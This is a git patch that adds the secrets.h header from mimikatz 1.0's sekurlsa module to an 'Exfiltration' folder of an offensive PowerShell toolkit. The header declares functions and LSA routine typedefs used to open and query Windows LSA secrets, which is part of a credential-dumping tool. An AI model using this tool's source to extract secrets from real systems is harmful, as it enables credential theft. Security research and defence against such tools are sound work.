From 59cd18360764af6e6133ad11ec9cd8295372e587 Mon Sep 17 00:00:00 2001 From: clymb3r Date: Tue, 1 Oct 2013 09:47:05 -0700 Subject: Adding Invoke-Mimikatz and Invoke-Ninjacopy --- .../librairies/sekurlsa/modules/secrets.h | 29 ++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h (limited to 'Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h') diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h new file mode 100644 index 0000000..cb74837 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h @@ -0,0 +1,29 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#pragma once +#include "kmodel.h" +#include "mod_text.h" +#include + +bool searchSECFuncs(); +__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector * mesArguments); +__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector * mesArguments); + +#define SECRET_SET_VALUE 0x00000001 +#define SECRET_QUERY_VALUE 0x00000002 + +typedef struct _LSA_SECRET +{ + DWORD Length; + DWORD MaximumLength; + wchar_t * Buffer; +} LSA_SECRET, *PLSA_SECRET; + +typedef NTSTATUS (WINAPI * PLSA_I_OPEN_POLICY_TRUSTED) (LSA_HANDLE * pHPolicy); +typedef NTSTATUS (WINAPI * PLSA_R_OPEN_SECRET) (LSA_HANDLE hPolicy, LSA_UNICODE_STRING *, DWORD dwAccess, LSA_HANDLE * hSecret); +typedef NTSTATUS (WINAPI * PLSA_R_QUERY_SECRET) (LSA_HANDLE hSecret, PLSA_SECRET * ppSecret, PVOID pCurrentValueSetTime, PLSA_UNICODE_STRING * ppOldSecret, PVOID pOldValueSetTime); +typedef NTSTATUS (WINAPI * PLSA_R_CLOSE) (LSA_HANDLE * pHandle); -- cgit v1.2.3